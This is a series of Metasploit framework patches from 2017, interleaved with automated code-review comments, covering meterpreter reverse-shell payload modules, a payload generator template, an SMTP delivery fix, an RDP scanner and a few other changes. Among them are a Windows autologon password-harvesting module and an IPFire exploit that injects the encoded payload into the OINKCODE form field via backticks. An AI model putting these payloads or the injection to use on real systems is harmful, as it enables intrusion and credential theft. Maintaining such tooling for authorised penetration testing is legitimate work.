diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index e25a8a17f4..a570d615ae 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3b829a34ea..37ceede91f 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 0aaaa207df..829b48db4f 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 467fc900fb..9117fdcca9 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index c00ef067ae..c5fa02fd76 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 22b5d30a1b..97c4075640 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 8da93cb5f7..423e829dd3 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb similarity index 61% rename from modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb rename to modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 756e3f5e73..0bb2dace76 100644 --- a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -3,13 +3,15 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core/handler/reverse_tcp' +require 'msf/core/handler/reverse_http' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_x86_osx' +require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule + CachedSize = 618316 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig @@ -18,23 +20,26 @@ module MetasploitModule super( update_info( info, - 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Name' => 'OSX Meterpreter, Reverse HTTP Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', 'Brent Cook ' ], 'Platform' => 'osx', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X64, 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_x86_OSX + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX ) ) end def generate - opts = {scheme: 'tcp'} - MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec end end 
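Review bot: The only OSX x86 Mettle payload, modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb, disappears with this rename (61% similarity to the new x64 reverse_http module) and nothing visible in this series adds an i386-apple-darwin replacement. If 32-bit OSX is intentionally dropped with the mettle bump, the commit message should say so; otherwise keep the x86 file and add meterpreter_reverse_http.rb as a new file. Separately, the 'Author' list here lacks `'timwr'`, which the updated tools/modules/meterpreter_reverse.erb template now emits, so the next run of generate_mettle_payloads.rb will rewrite this module with a different header.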
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..2f08049976 --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + CachedSize = 618316 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index dbb741e67c..43070ef0ae 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule + CachedSize = 618316 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig 
@@ -34,7 +36,10 @@ module MetasploitModule end def generate - opts = {scheme: 'tcp'} + opts = { + scheme: 'tcp', + stageless: true + } MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec end end diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 91d8bbb520..967a051b81 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb 
@@ -12,32 +12,36 @@ schemes = [ ] arches = [ - ['aarch64', 'aarch64-linux-musl'], - ['armbe', 'armv5b-linux-musleabi'], - ['armle', 'armv5l-linux-musleabi'], - ['mips64', 'mips64-linux-muslsf'], - ['mipsbe', 'mips-linux-muslsf'], - ['mipsle', 'mipsel-linux-muslsf'], - ['ppc', 'powerpc-linux-muslsf'], - ['ppc64le', 'powerpc64le-linux-musl'], - ['x64', 'x86_64-linux-musl'], - ['x86', 'i486-linux-musl'], - ['zarch', 's390x-linux-musl'], + ['aarch64','Linux', 'aarch64-linux-musl'], + ['armbe', 'Linux', 'armv5b-linux-musleabi'], + ['armle', 'Linux', 'armv5l-linux-musleabi'], + ['mips64', 'Linux', 'mips64-linux-muslsf'], + ['mipsbe', 'Linux', 'mips-linux-muslsf'], + ['mipsle', 'Linux', 'mipsel-linux-muslsf'], + ['ppc', 'Linux', 'powerpc-linux-muslsf'], + ['ppc64le','Linux', 'powerpc64le-linux-musl'], + ['x64', 'Linux', 'x86_64-linux-musl'], + ['x86', 'Linux', 'i486-linux-musl'], + ['zarch', 'Linux', 's390x-linux-musl'], + ['x64', 'OSX', 'x86_64-apple-darwin'], ] arch = '' payload = '' +platform = '' scheme = '' cwd = File::dirname(__FILE__) -template = File::read(File::join(cwd, 'linux_meterpreter_reverse.erb')) -renderer = ERB.new(template) -arches.each do |a, p| +arches.each do |a, pl, pa| schemes.each do |s| arch = a - payload = p + platform = pl + payload = pa scheme = s - filename = File::join('modules', 'payloads', 'singles', 'linux', arch, "meterpreter_reverse_#{scheme}.rb") + + template = File::read(File::join(cwd, "meterpreter_reverse.erb")) + renderer = ERB.new(template) + filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb") File::write(filename, renderer.result()) end end diff --git a/tools/modules/linux_meterpreter_reverse.erb b/tools/modules/meterpreter_reverse.erb similarity index 72% rename from tools/modules/linux_meterpreter_reverse.erb rename to tools/modules/meterpreter_reverse.erb index bffd3a8edb..6ff39341d0 100644 --- a/tools/modules/linux_meterpreter_reverse.erb 
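Review bot: The output path is built from `platform` verbatim (`'Linux'`, `'OSX'`), so on a case-sensitive filesystem `File::join('modules', 'payloads', 'singles', platform, arch, ...)` writes into modules/payloads/singles/Linux/ and modules/payloads/singles/OSX/ instead of the existing lowercase directories; the template itself already uses `platform.downcase` for the 'Platform' key and the require line, so the generator should do the same: `filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb")`. The `File::read`/`ERB.new` pair was also moved inside the inner `schemes.each` loop, so the same template is re-read and re-parsed for every arch/scheme pair; it can go back above `arches.each` now that the filename no longer varies.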
+++ b/tools/modules/meterpreter_reverse.erb @@ -6,7 +6,7 @@ require 'msf/core/handler/reverse_<%= scheme %>' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_<%= arch %>_linux' +require 'msf/base/sessions/meterpreter_<%= arch %>_<%= platform.downcase %>' module MetasploitModule @@ -18,23 +18,27 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse <%= scheme.upcase %> Inline', + 'Name' => '<%= platform %> Meterpreter, Reverse <%= scheme.upcase %> Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], - 'Platform' => 'linux', + 'Platform' => '<%= platform.downcase %>', 'Arch' => ARCH_<%= arch.upcase %>, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::Reverse<%= scheme.capitalize %>, - 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_Linux + 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_<%= platform %> ) ) end def generate - opts = {scheme: '<%= scheme %>'} + opts = { + scheme: '<%= scheme %>', + stageless: true + } MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec end end From 638559314890c566191814015d92e659de485a95 Mon Sep 17 00:00:00 2001 From: Jin Qian Date: Tue, 18 Jul 2017 14:30:44 -0500 Subject: [PATCH 43/63] Fix SE campaign exception. MS-2705, SE_campaign will crash when RCPT command got socket closure as a response. Thanks to Pearce for the triage. --- lib/msf/core/exploit/smtp_deliver.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) mode change 100644 => 100755 lib/msf/core/exploit/smtp_deliver.rb diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb old mode 100644 new mode 100755 index 32460885dd..b17d67270c --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb 
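Review bot: Adding `'timwr'` to the template's 'Author' list means every regenerated module, including all eleven Linux payloads whose headers in this same series still list only Cammack and Cook, will change its author block the next time the generator runs. If the credit is meant for the OSX additions only, make it conditional, e.g. `<% if platform == 'OSX' %>'timwr'<% end %>` in the list, or drop it from the shared template and keep the hand-edited OSX modules in sync with what the generator produces.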
@@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock) res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock) - if res[0..2] == '250' + if res && res[0..2] == '250' resp = raw_send_recv("DATA\r\n", nsock) # If the user supplied a Date field, use that, else use the current @@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver # to dump it all. vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end - - nsock.put(cmd) - res = nsock.get_once - + begin + nsock.put(cmd) + res = nsock.get_once + rescue + return nil + end # Don't truncate the server output because it might be helpful for # debugging. vprint_status("S: #{res.strip}") if res From 45f81f3c98ba8779a327c19aabe88a2344186224 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Tue, 18 Jul 2017 12:45:02 -0700 Subject: [PATCH 44/63] Squash some style issues --- modules/auxiliary/scanner/rdp/rdp_scanner.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/rdp_scanner.rb b/modules/auxiliary/scanner/rdp/rdp_scanner.rb index 50c4cb8c01..d38c87dc14 100644 --- a/modules/auxiliary/scanner/rdp/rdp_scanner.rb +++ b/modules/auxiliary/scanner/rdp/rdp_scanner.rb 
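Review bot: The bare `rescue` around `nsock.put`/`nsock.get_once` in raw_send_recv catches every StandardError, including NoMethodError or TypeError from a bug elsewhere, and returns nil with no diagnostic, so a closed socket and a programming error now look identical to the caller. Narrow it to the socket failures this fix is about and say what happened: `rescue ::EOFError, ::IOError, ::Errno::ECONNRESET, ::Errno::EPIPE => e` / `vprint_error("Socket error while sending #{cmd.strip[0, 120]}: #{e.class}")` / `return nil`. In the first hunk the nil guard on the RCPT response is right, but the non-250 branch and the rest of the send method continue outside the hunk, so whether a nil (connection gone) is reported differently from a real rejection is not visible here. The diffstat also changes the file mode to 100755, which a library file has no reason to carry.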
@@ -57,18 +57,18 @@ class MetasploitModule < Msf::Auxiliary def setup # build a simple TPKT v3 + x.224 COTP Connect Request. optionally append # RDP negotiation request with TLS, CredSSP and Early User as requesteste - requestedProtocols = 0 + requested_protocols = 0 if datastore['TLS'] - requestedProtocols = requestedProtocols ^ 0b1 + requested_protocols = requested_protocols ^ 0b1 end if datastore['CredSSP'] - requestedProtocols = requestedProtocols ^ 0b10 + requested_protocols = requested_protocols ^ 0b10 end if datastore['EarlyUser'] - requestedProtocols = requestedProtocols ^ 0b1000 + requested_protocols = requested_protocols ^ 0b1000 end - if requestedProtocols == 0 + if requested_protocols == 0 tpkt_len = 11 cotp_len = 6 pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0 ] @@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary else tpkt_len = 19 cotp_len = 14 - pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requestedProtocols ] + pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requested_protocols ] pack_string = "CCnCCnnCCCCCV" end @probe = pack.pack(pack_string) @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary disconnect end - service = report_service( + report_service( host: rhost, port: rport, proto: 'tcp', From 0d3f5ae22085ec23f3ec4a45b3349ab444f2a050 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 18 Jul 2017 22:50:34 +0200 Subject: [PATCH 45/63] cleanup windows_autologin --- .../gather/credentials/windows_autologin.rb | 22 +++++-------------- 1 file changed, 6 insertions(+), 16 deletions(-) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 0cf6f1170f..2ef17660bf 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb 
@@ -45,8 +45,6 @@ class MetasploitModule < Msf::Post has_al = 0 - # DefaultDomainName, DefaultUserName, DefaultPassword - # AltDefaultDomainName, AltDefaultUserName, AltDefaultPassword logon_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\" al = registry_getvaldata(logon_key, "AutoAdminLogon") || '' @@ -58,24 +56,16 @@ class MetasploitModule < Msf::Post du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || '' dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || '' - if do1 != '' and du1 != '' and dp1 == '' and al == '1' + if do1 != '' && du1 != '' && dp1 == '' has_al = 1 - creds << [du1,dp1, do1] - print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") - elsif do1 != '' and du1 != '' and dp1 != '' - has_al = 1 - creds << [du1,dp1, do1] - print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") + creds << [du1, dp1, do1] + print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") end - if do2 != '' and du2 != '' and dp2 == '' and al == '1' + if do2 != '' && du2 != '' && dp2 == '' has_al = 1 - creds << [du2,dp2,do2] - print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") - elsif do2 != '' and du2 != '' and dp2 != '' - has_al = 1 - creds << [du2,dp2,do2] - print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") + creds << [du2, dp2, do2] + print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") end if has_al == 0 From 0f31edfe39ae5d33775bcb7d7dcc0083453107ba Mon Sep 17 00:00:00 2001 From: Jin Qian Date: Tue, 18 Jul 2017 16:17:53 -0500 Subject: [PATCH 46/63] Change tab into space to be standard compliant Thanks to Brent and Dave for pointing it out. --- lib/msf/core/exploit/smtp_deliver.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index b17d67270c..36c03bca7c 100755 
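Review bot: The collapsed condition `if do1 != '' && du1 != '' && dp1 == ''` only fires when DefaultPassword is empty, so the case the old code also reported, a non-empty DefaultPassword, is now silently dropped, and that is exactly the credential this module exists to collect; the Alt block has the same regression. It should read `if do1 != '' && du1 != '' && (dp1 != '' || al == '1')` (and likewise for dp2), which a later commit in this series does restore. The `has_al` integer flag could be a boolean (`found = true`) now that the branches are simplified; the enclosing `run` method continues outside the hunk.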
--- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -242,12 +242,12 @@ module Exploit::Remote::SMTPDeliver # to dump it all. vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end - begin - nsock.put(cmd) - res = nsock.get_once - rescue - return nil - end + begin + nsock.put(cmd) + res = nsock.get_once + rescue + return nil + end # Don't truncate the server output because it might be helpful for # debugging. vprint_status("S: #{res.strip}") if res From 116a838cb070d11af2e85e61f551ed7df5a82782 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 19 Jul 2017 13:26:40 -0500 Subject: [PATCH 47/63] Version check update and stylistic fix --- .../linux/http/ipfire_oinkcode_exec.rb | 27 ++++++++++--------- 1 file changed, 14 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index d4238b6c0b..8350d51a5d 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -67,18 +67,20 @@ class MetasploitModule < Msf::Exploit::Remote 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) - if res and res.code == 200 + if res && res.code == 200 /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body end - - # now that we've pulled the info we need, check version. - if version && update && version == '2.19' && update.to_i <= 110 + if version.nil? || update.nil? || !Gem::Version.correct?(version) + vprint_error('No Recognizable Version Found') + CheckCode::Safe + elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110 CheckCode::Appears else + vprint_error('Version and/or Update Not Supported') CheckCode::Safe end - rescue ::Rex::ConnectionError + print_error("Connection Failed") CheckCode::Safe end end 
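Review bot: In the ipfire check method the `::Rex::ConnectionError` branch returns `CheckCode::Safe`, which asserts the target is not vulnerable when it merely could not be reached; it should return `CheckCode::Unknown` and use `vprint_error("#{peer} - Connection failed")` to match the two other vprint_error calls added in this hunk. The version test also widened from exactly 2.19 to `Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110`, so every older release now reports Appears; if earlier releases were not verified, a comment such as `# Core Update numbering is assumed to be monotonic across 2.x releases` would make that assumption explicit for the next maintainer.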
@@ -97,20 +99,19 @@ class MetasploitModule < Msf::Exploit::Remote 'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, 'vars_post' => { - 'ENABLE_SNORT_GREEN' => 'on', - 'ENABLE_SNORT' => 'on', - 'RULES' => 'registered', - 'OINKCODE' => "`#{payload.encoded}`", - 'ACTION' => 'Download new ruleset', - 'ACTION2' => 'snort' + 'ENABLE_SNORT_GREEN' => 'on', + 'ENABLE_SNORT' => 'on', + 'RULES' => 'registered', + 'OINKCODE' => "`#{payload.encoded}`", + 'ACTION' => 'Download new ruleset', + 'ACTION2' => 'snort' } ) # success means we hang our session, and wont get back a response, so just check we get a response back - if res && res.code != 200 + if res && res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") end - rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end From 22e8f1cb48a5bd3f1d0b319e62b3a24fba709af5 Mon Sep 17 00:00:00 2001 From: Corey Harding Date: Thu, 20 Jul 2017 05:09:00 -0400 Subject: [PATCH 48/63] HWBRIDGE RFTRANSCEIVER ADD LOWBALL SUPPORT --- .../post/hardware/rftransceiver/rftransceiver.rb | 10 ++++++++++ .../extensions/rftransceiver/rftransceiver.rb | 4 ++++ .../console/command_dispatcher/rftransceiver.rb | 15 +++++++++++++++ 3 files changed, 29 insertions(+) diff --git a/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb b/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb index 5ecb336ec3..7bc09175f9 100644 --- a/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb +++ b/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb 
@@ -278,6 +278,16 @@ module RFTransceiver return_success(r) end + # + # Sets lowball. Ensure you set the frequency first before using this + # @return [Boolean] success value + def set_lowball + return false unless is_rf? + self.index ||= 0 + r = client.rftransceiver.set_lowball(self.index) + return_success(r) + end + # # Set power level # @param level [Integer] Power level diff --git a/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb b/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb index 9ef945f8d8..eae14ba6fc 100644 --- a/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb +++ b/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb @@ -186,6 +186,10 @@ class RFTransceiver < Extension client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}") end + def set_lowball(idx) + client.send_request("/rftransceiver/#{idx}/set_lowball") + end + def set_maxpower(idx) client.send_request("/rftransceiver/#{idx}/set_maxpower") end diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb index f2f3b4ec26..d8885e8a6d 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb @@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver 'deviation' => 'sets the deviation', 'sync_word' => 'sets the sync word', 'preamble' => 'sets the preamble number', + 'lowball' => 'sets lowball' 'power' => 'sets the power level', 'maxpower' => 'sets max power' } 
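Review bot: The new hash entry `'lowball' => 'sets lowball'` in the command dispatcher has no trailing comma before `'power' => 'sets the power level'`, so the hash literal does not parse and the whole RFtransceiver dispatcher fails to load; it needs to be `'lowball' => 'sets lowball',` (a later commit in this series adds it). The two library hunks look consistent with their siblings, though the YARD comment on Msf's `set_lowball` could state what lowball mode does on the radio rather than only that frequency must be set first, since the name alone does not explain it.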
@@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver print_success(r) end + def cmd_lowball_help + print_line("Lowball is frequency dependent. Set frequency first") + end + + def cmd_lowball(*args) + self.idx ||= 0 + if args.length.positive? + cmd_lowball_help + return + end + r = client.rftransceiver.set_lowball(idx) + print_success(r) + end + def cmd_maxpower_help print_line("Max power is frequency dependent. Set frequency first") end From 1d0db02a64db4cbe9381820d3a9e4339d54e490a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 20 Jul 2017 09:10:19 -0500 Subject: [PATCH 49/63] bump payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index d19609ffa3..657a706da9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -30,7 +30,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.37) metasploit_data_models - metasploit_payloads-mettle (= 0.1.13) + metasploit_payloads-mettle (= 0.1.14) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.13) + metasploit_payloads-mettle (0.1.14) method_source (0.8.2) mini_portile2 (2.2.0) minitest (5.10.2) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 4b6614e1b3..68cdb6e924 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.13' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From d0aeef9f8e24d6e962c6a8e1280d6fef35b58012 Mon Sep 17 00:00:00 2001 
From: Samuel Huckins Date: Thu, 20 Jul 2017 09:32:52 -0500 Subject: [PATCH 50/63] Removed dead SourceForge link --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index ba8aace800..1f81cd5294 100644 --- a/README.md +++ b/README.md @@ -14,8 +14,7 @@ New bugs and feature requests should be directed to: API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api -Questions and suggestions can be sent to: - https://lists.sourceforge.net/lists/listinfo/metasploit-hackers +Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list Installing -- From c5101b71a0c659503f8f71e5d463bd1a01962e17 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 20 Jul 2017 23:21:19 -0500 Subject: [PATCH 51/63] bump rex-core, reverting threadsafe select changes --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index ba7dbd295d..cbe79418fc 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -256,7 +256,7 @@ GEM rex-core rex-struct2 rex-text - rex-core (0.1.11) + rex-core (0.1.12) rex-encoder (0.1.4) metasm rex-arch From 3043218a7f6b1d04ffdec614e972418c13c9718f Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Fri, 21 Jul 2017 11:43:49 -0500 Subject: [PATCH 52/63] Indention and missing comma fixup. --- .../hwbridge/ui/console/command_dispatcher/rftransceiver.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb index d8885e8a6d..0e3de354f4 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb 